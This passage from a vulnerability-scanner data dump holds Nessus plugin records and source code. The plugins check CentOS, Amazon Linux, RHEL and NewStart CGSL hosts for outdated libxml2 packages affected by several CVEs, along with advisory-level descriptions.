'content/fastrack/rhel/server/7/x86_64/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/system-z/7/s390x/debug',\n 'content/fastrack/rhel/system-z/7/s390x/optional/debug',\n 'content/fastrack/rhel/system-z/7/s390x/optional/os',\n 'content/fastrack/rhel/system-z/7/s390x/optional/source/SRPMS',\n 'content/fastrack/rhel/system-z/7/s390x/os',\n 'content/fastrack/rhel/system-z/7/s390x/source/SRPMS',\n 'content/fastrack/rhel/workstation/7/x86_64/debug',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/debug',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/os',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/7/x86_64/os',\n 'content/fastrack/rhel/workstation/7/x86_64/source/SRPMS'\n ],\n 'pkgs': 
[\n {'reference':'libxml2-2.9.1-6.el7.4', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-devel-2.9.1-6.el7.4', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'ppc64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'ppc64le', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-static-2.9.1-6.el7.4', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n 
_release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libxml2 / libxml2-devel / libxml2-python / libxml2-static');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:20", "description": "The remote CentOS Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2020:1190 advisory.\n\n - libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n - libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n - libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n - libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n - libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n - libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-04-10T00:00:00", "type": "nessus", "title": "CentOS 7 : libxml2 (CESA-2020:1190)", "bulletinFamily": "scanner", 
"cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567"], "modified": "2021-03-16T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libxml2", "p-cpe:/a:centos:centos:libxml2-devel", "p-cpe:/a:centos:centos:libxml2-python", "p-cpe:/a:centos:centos:libxml2-static", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2020-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/135358", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:1190 and\n# CentOS Errata and Security Advisory 2020:1190 respectively.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135358);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/16\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_xref(name:\"RHSA\", value:\"2020:1190\");\n\n script_name(english:\"CentOS 7 : libxml2 (CESA-2020:1190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:1190 advisory.\n\n - libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n - libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n - libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n - libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n - libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n - 
libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.centos.org/pipermail/centos-cr-announce/2020-April/012518.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ed8ea19\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/252.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/400.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/476.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5131\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(252, 400, 476);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'CentOS 7.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'libxml2-2.9.1-6.el7.4', 'cpu':'i686', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-devel-2.9.1-6.el7.4', 'cpu':'i686', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-devel-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'x86_64', 
'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-static-2.9.1-6.el7.4', 'cpu':'i686', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-static-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'CentOS-7', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : 
rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libxml2 / libxml2-devel / libxml2-python / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:05:44", "description": "A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case. Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application. (CVE-2018-14404)\n\nUse after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n(CVE-2017-15412)\n\nA denial of service flaw was found in libxml2. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to crash.\n(CVE-2015-8035)\n\nlibxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251 . (CVE-2018-14567)\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file.\n(CVE-2017-18258)\n\nUse-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. 
(CVE-2016-5131)", "cvss3": {}, "published": "2020-07-23T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : libxml2 (ALAS-2020-1466)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567", "CVE-2018-9251"], "modified": "2020-07-27T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libxml2", "p-cpe:/a:amazon:linux:libxml2-debuginfo", "p-cpe:/a:amazon:linux:libxml2-devel", "p-cpe:/a:amazon:linux:libxml2-python", "p-cpe:/a:amazon:linux:libxml2-static", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2020-1466.NASL", "href": "https://www.tenable.com/plugins/nessus/138855", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2020-1466.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138855);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/27\");\n\n script_cve_id(\"CVE-2015-8035\", \"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-18258\", \"CVE-2018-14404\", \"CVE-2018-14567\");\n script_xref(name:\"ALAS\", value:\"2020-1466\");\n\n script_name(english:\"Amazon Linux 2 : libxml2 (ALAS-2020-1466)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A NULL pointer dereference vulnerability exists in the\nxpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when\nparsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR\ncase. Applications processing untrusted XSL format inputs with the use\nof the libxml2 library may be vulnerable to a denial of service attack\ndue to a crash of the application. 
(CVE-2018-14404)\n\nUse after free in libxml2 before 2.9.5, as used in Google Chrome prior\nto 63.0.3239.84 and other products, allowed a remote attacker to\npotentially exploit heap corruption via a crafted HTML page.\n(CVE-2017-15412)\n\nA denial of service flaw was found in libxml2. A remote attacker could\nprovide a specially crafted XML or HTML file that, when processed by\nan application using libxml2, would cause that application to crash.\n(CVE-2015-8035)\n\nlibxml2 2.9.8, if --with-lzma is used, allows remote attackers to\ncause a denial of service (infinite loop) via a crafted XML file that\ntriggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different\nvulnerability than CVE-2015-8035 and CVE-2018-9251 . (CVE-2018-14567)\n\nThe xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote\nattackers to cause a denial of service (memory consumption) via a\ncrafted LZMA file, because the decoder functionality does not restrict\nmemory usage to what is required for a legitimate file.\n(CVE-2017-18258)\n\nUse-after-free vulnerability in libxml2 through 2.9.4, as used in\nGoogle Chrome before 52.0.2743.82, allows remote attackers to cause a\ndenial of service or possibly have unspecified other impact via\nvectors related to the XPointer range-to function. 
(CVE-2016-5131)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2020-1466.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update libxml2' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-2.9.1-6.amzn2.4.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-debuginfo-2.9.1-6.amzn2.4.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-devel-2.9.1-6.amzn2.4.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-python-2.9.1-6.amzn2.4.1\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"libxml2-static-2.9.1-6.amzn2.4.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:32", "description": "The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has libxml2 packages installed that are affected by multiple 
vulnerabilities:\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (CVE-2016-5131)\n\n - Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2017-15412)\n\n - A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2 through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case.\n Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable to a denial of service attack due to a crash of the application. (CVE-2018-14404)\n\n - libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different vulnerability than CVE-2015-8035 and CVE-2018-9251. (CVE-2018-14567)\n\n - The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict memory usage to what is required for a legitimate file. 
(CVE-2017-18258)\n\n - The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.\n (CVE-2015-8035)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "NewStart CGSL CORE 5.05 / MAIN 5.05 : libxml2 Multiple Vulnerabilities (NS-SA-2020-0091)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567", "CVE-2018-9251"], "modified": "2020-12-10T00:00:00", "cpe": [], "id": "NEWSTART_CGSL_NS-SA-2020-0091_LIBXML2.NASL", "href": "https://www.tenable.com/plugins/nessus/143920", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2020-0091. 
The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143920);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/10\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_bugtraq_id(\n 77390,\n 92053,\n 102098,\n 105198\n );\n\n script_name(english:\"NewStart CGSL CORE 5.05 / MAIN 5.05 : libxml2 Multiple Vulnerabilities (NS-SA-2020-0091)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote machine is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version CORE 5.05 / MAIN 5.05, has libxml2 packages installed that are affected\nby multiple vulnerabilities:\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82,\n allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (CVE-2016-5131)\n\n - Use after free in libxml2 before 2.9.5, as used in Google Chrome prior to 63.0.3239.84 and other products,\n allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2017-15412)\n\n - A NULL pointer dereference vulnerability exists in the xpath.c:xmlXPathCompOpEval() function of libxml2\n through 2.9.8 when parsing an invalid XPath expression in the XPATH_OP_AND or XPATH_OP_OR case.\n Applications processing untrusted XSL format inputs with the use of the libxml2 library may be vulnerable\n to a denial of service attack due to a crash of the application. 
(CVE-2018-14404)\n\n - libxml2 2.9.8, if --with-lzma is used, allows remote attackers to cause a denial of service (infinite\n loop) via a crafted XML file that triggers LZMA_MEMLIMIT_ERROR, as demonstrated by xmllint, a different\n vulnerability than CVE-2015-8035 and CVE-2018-9251. (CVE-2018-14567)\n\n - The xz_head function in xzlib.c in libxml2 before 2.9.6 allows remote attackers to cause a denial of\n service (memory consumption) via a crafted LZMA file, because the decoder functionality does not restrict\n memory usage to what is required for a legitimate file. (CVE-2017-18258)\n\n - The xz_decomp function in xzlib.c in libxml2 2.9.1 does not properly detect compression errors, which\n allows context-dependent attackers to cause a denial of service (process hang) via crafted XML data.\n (CVE-2015-8035)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2020-0091\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL libxml2 packages. Note that updated packages may not be available yet. 
Please contact ZTE\nfor more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15412\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL CORE 5.05\" &&\n release !~ \"CGSL MAIN 5.05\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL CORE 5.05 / NewStart CGSL MAIN 5.05');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nflag = 0;\n\npkgs = {\n 'CGSL CORE 5.05': [\n 'libxml2-2.9.1-6.el7.4',\n 'libxml2-debuginfo-2.9.1-6.el7.4',\n 'libxml2-devel-2.9.1-6.el7.4',\n 'libxml2-python-2.9.1-6.el7.4',\n 'libxml2-static-2.9.1-6.el7.4'\n ],\n 'CGSL MAIN 5.05': [\n 